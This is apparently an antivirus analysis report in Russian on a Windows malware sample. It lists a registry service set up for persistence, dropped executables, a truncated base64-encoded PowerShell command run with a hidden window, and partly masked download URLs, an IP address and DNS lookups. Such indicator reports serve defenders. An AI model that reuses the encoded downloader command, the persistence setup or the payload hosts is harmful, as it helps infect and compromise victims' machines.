Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\scksp] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\scksp] 'ImagePath' = '"%WINDIR%\SysWOW64\BWContextHandler\scksp.exe"'
- 'scksp' "%WINDIR%\SysWOW64\BWContextHandler\scksp.exe"
- 'scksp' %WINDIR%\SysWOW64\BWContextHandler\scksp.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABYAGwAZgA4ADIAbwAyAD0AKAAoACcARgA2ACcAKwAnADcAOQAnACkAKwAnADgANwAnACsAJwBvACcAKQA7AC4AKAAnAG4AZQB3AC0AJwArACcAaQB0AGUAbQAnACkAIAAkAEUAbgBWADoAdQBTAGUAUgBwAFIATwBGAEkAbA...
- %HOMEPATH%\glh14ii\y2t3rtp\t2oh0m.exe
- %WINDIR%\syswow64\bwcontexthandler\scksp.exe
- %HOMEPATH%\glh14ii\y2t3rtp\t2oh0m.exe в %WINDIR%\syswow64\bwcontexthandler\scksp.exe
- '19#.#91.171.72':80
- http://po##vor.si/wp-snapshots/browse/sqcxxh/223jgy8iM/
- http://ek#####a.megadata.co/wp-content/VFWW/
- http://19#.#91.171.72/48Sr/B5RIZe/0Yd90eu2M/
- DNS ASK po##vor.si
- DNS ASK ek#####a.megadata.co
- '%HOMEPATH%\glh14ii\y2t3rtp\t2oh0m.exe'
- '%WINDIR%\syswow64\bwcontexthandler\scksp.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABYAGwAZgA4ADIAbwAyAD0AKAAoACcARgA2ACcAKwAnADcAOQAnACkAKwAnADgANwAnACsAJwBvACcAKQA7AC4AKAAnAG4AZQB3AC0AJwArACcAaQB0AGUAbQAnACkAIAAkAEUAbgBWADoAdQBTAGUAUgBwAFIATwBGAEkAbA...' (со скрытым окном)